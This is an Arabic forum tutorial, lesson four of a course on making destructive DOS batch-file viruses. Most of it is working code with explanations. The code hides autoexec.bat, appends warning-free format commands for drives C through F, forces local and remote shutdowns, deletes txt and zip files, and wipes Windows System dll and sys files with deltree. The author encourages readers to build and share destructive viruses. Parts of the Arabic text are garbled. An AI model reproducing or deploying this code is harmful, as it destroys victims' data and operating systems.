انت مو كونت فيروس كويس اعمل التالي ادخل الى الدوس و ادخل الى ملف الفيروس فرضًا اسم الفيروس moodax.batاذن اكتب التالي: ren moodax.bat ~moodax*<virus.bat هذا المر يمنع اي شخص من حذف الفيروس طبعًا السؤال اخواني انتظروا الدرس التالي للجواب لكن من اجل العلم فقط لنه الوندوز ما يقبل علمات او اي شيء غير الحرف و الرقام لهذا سوف تحدث معركة بين الوندوز و المضاد علقناها...
بسم الله الرحمن الرحيم الدرس الرابع: للحتراف صناعة الفيروسات المقدمة: في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علقة في الدورة مثل طريقة التشفير و تغير المتداد و الذكاء الفيروسي مع اني لم اعطي ال جزء منه ان هذا الدرس ل تحدث عن الذكاء الفيروسي ل كن نحن ل نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعًا لماذا
اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الن ليست لغة برمجية بتاتًا لكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها ل تعمل ال اذ كان هناك على الحاسب نظام دوس السبب لنه قد اشرنا في الدرس الول في قسم المقدمة في الجزء الول)) تعريف(( انه الملفات الدفاعية هي ليست ال حزمة من اوامر نظام التشغيل الدوس... 1الكود الكثر استخدامًا: في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات .1هذا الكود لمنع كشف المضاد على الفايروس
كود:PHP call attrib h r c:autoexec.bat >nul .2هذا الكود للفورمات
كود:PHP echo format a: /q /u /autotest >nul >>c:autoexec.bat .3هذا كود للفورمات لكن بالختصار
كود:PHP echo & /autotest >nul >>c:autoexec.bat ألولى تعنى انسخ المر القادم الى )طبعًا معروف من الكود الول انة الى الوتواكسك( الثانية تعنى اجراء وتنفيذ المر بدون طلب تحذير بتاع yes and NO لأانك عارف لما تعمل فورمات لبد ان يحذرك الول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان النسخ يكون الى ملف الوتواكسيك فى السى .4هذا كود فورمات كل القراص|385|
:PHP كود echo format c: /q /u /autotest >nul >>c:autoexec.bat echo format d: /q /u /autotest >nul >>c:autoexec.bat echo format e: /q /u /autotest >nul >>c:autoexec.bat echo format f: /q /u /autotest >nul >>c:autoexec.bat : علجه و التنازلي العد فيروس كود هذا.5
:PHP كود @echo off
shutdown sاذا فتحت الفايروس راح يعد تنازلي من 30ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:PHP @echo off "shutdown s t 30 c "messageطبعا نغير 30 الى عدد الثوان و message الى الرسالة اغلق الجهاز على الشبكة @echo off shutdown s t 15 c "message" m \\namecomputerطبعا نغير 15 الى عدد الثوان و messageالى الرسالة ونغير namecomputer الى الجهاز المراد اغلقه العلج: shutdown –a 2مجموعة من الكودات مع الشرح) المفصل(: اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لكن مع شرح مفصل جدًا 1اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء ل اكس ملف تكست |391| اسمة مث ً ملحظة : يمكنك وضع اى كود dos غير الفورمات على هذة القاعدة
كود:PHP call attrib h r c:autoexec.bat >nul echoكود دوسىnul >>c:autoexec.bat< والسطر الخير يكرر ان كنت تريد اما اذا كانت العملية تتطلب الغاء رسالة تحذيرية فتكون القاعدة
كود:PHP call attrib h r c:autoexec.bat >nul echoكود دوسىautotest >nul >>c:autoexec.bat/ مع تكرار السطر الخير ان تتطلب ويمكنك وضع قاعدة مشتركة
كود:PHP call attrib h r c:autoexec.bat >nul echoكود دوسىautotest >nul >>c:autoexec.bat/ echoكود دوسىnul >>c:autoexec.bat< يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد السطور فلبد من اضافة autotest/ لتفادى الرسالة التحذيرية 2اذ اردت كتابت كود فايروسي يعمل التالي يدخل على قرص الذي عندى الضحية ويقوم بالغاء ل اكس هل هذة الفكرة تعترضها ملف تكست اسمة مث ً رسالة تحذيرية بالطبع ل اذن اتبع القاعدة الولى يكون الكود كما يال
كود:PHP call attrib h r c:autoexec.bat >nul echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat التحليل
كود:PHP call attrib h r c:autoexec.bat >nul ذكرنا انفًا الن لدخول الدريف والغاء ملف اسمة ل( فى الدوس كنت باتكتب اكس)تكست مث ً c:/ press enterفيتحول المحث |373| الى /:d للغاء هاتكتب d:/Del x.txt press enterاذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعد الخطوات ومعنا الكود الساسى للفيرس نستنتج التالى عدد سطر الكود لبد ان يكون اثنين + واحد) اساسى( + اى عدد لو عاوز تكمل الفيرس لشىء تانى فيكون
:PHP كود call attrib h r c:autoexec.bat >nul ()اساسى
:PHP كود echo d: >nul >>c:autoexec.bat (دى الدريف على )الدخول
:PHP كود echo Del x.txt >nul >>c:autoexec.bat
)الغاء ملف امسة اكس تكست( تذكر:::::
كود:PHP echoكود الدوسnul >>c:autoexec.bat< 3اذ اردت الغاء كل الملفات التي امتدادها txt. في القرص
كود:PHP call attrib h r c:autoexec.bat >nul echo d: >nul >>c:autoexec.bat echo Del *.txt >nul >>c:autoexec.bat 4اذ اردت الغاء كل الملفات التي امتدادهاzip. في القرص
:PHP كود call attrib h r c:autoexec.bat >nul echo d: >nul >>c:autoexec.bat echo Del *.zip >nul >>c:autoexec.bat : تحليله و |300| النظام ملفات بالغاء يقوم كود 5
:PHP كود Echo off@ :c cd %WinDir%System deltree /y *.dll cd deltree /y *.sys : تحليلة السى على دخلنا :c
كود:PHP cd %WinDir%System دخلنا على ملف السيستم فى الوندوز
كود:PHP deltree /y *.dll الغاء كل ملفات المتداد .DLL والتى هي خاص بالوندوز \cdخرجنا بعد تنفيذ العملية الولى
كود:PHP
deltree /y *.sys .الوندوز فى .sys ملفات كل الغاء و انه تعرف انت و التاريخ كود عدى ما كامل الكود هذا طريق عن التاريخ على يعتمد فيروس صنع استطيع ل ايقاف على الكود هذا يعمل الدفاعية الملفات يمكنك اردت اذ و فقط C,D,E,F فورمات و المضادات قرأت انت انه اعتقد التشغيل اعادة كود و , الضافة ... الول و الثاني الدرس
:PHP كود Echo Virus Format@ Echo www.3asfh.comvb@ Echo By RBG7@ call attrib h r c:autoexec.bat >nul format c: /q /u /autotest >nul >>c:autoexec.bat format d: /q /u /autotest >nul >>c:autoexec.bat format e: /q /u /autotest >nul >>c:autoexec.bat format f: /q /u /autotest >nul >>c:autoexec.bat shutdown s End
كود:PHP call attrib h r c:autoexec.bat >nul : Callللتصال في ملف من نوعBat : Attribهذا امر خاص بالدوس يعمل على تغير خصائص ملف : hاخفاء : rجعله فقط قراءة : c:\autoexec.batالملف المراد التنفيذ عليه < : nul هذا المر شروح في الدرس الول و يعمل على عدم سؤال المستخدم
كود:PHP format a: /q /u /autotest >nul >>c:autoexec.bat : Formatامر الفورمات :aالمر يطبق على القرصA : q/سريع
: u/يقوم بحذف الملفات الساسية : autotest/هذا المر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب< : << nulنقل من دون سؤال : c:\autoexec.batالملف الذي سوف يطبق به الكود @echo off "shutdown s t 30 c "messageطبعا نغير 30 الى عدد الثوان و message الى الرسالة اغلق الجهاز على الشبكة @ : echo offعدم استخدام المرEcho اخوي البعض يسأل لمذا وضع هذا المر في بعض الحيان يخطاء المبرمج و يكتب المر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذ : shutdown sاطفاء الحاسب : tالوقت : 30ثانية : cاظهار رسالة : messageاكتب الرسالة التي تريد
كود:PHP @Echo off :c
cd %WinDir%System deltree /y *.dll cd deltree /y *.sys نعم اخوي هذا كود كامل لفيروس تدمير النظام ل يكتب في سطر واحد و السبب لنه كود كامل و ليس امر اخوتي لن وبعد متابعتك للمواضع الربعة ستصبح محترف في صنع الفيروسات المدمرة واطلب منكم كل من تابع المواضيع بان يصنع كود فايروسه ويضعه في قسم خاص بالكودات للصنع الفايروس من اجل تطويره اخوكم mr_shark96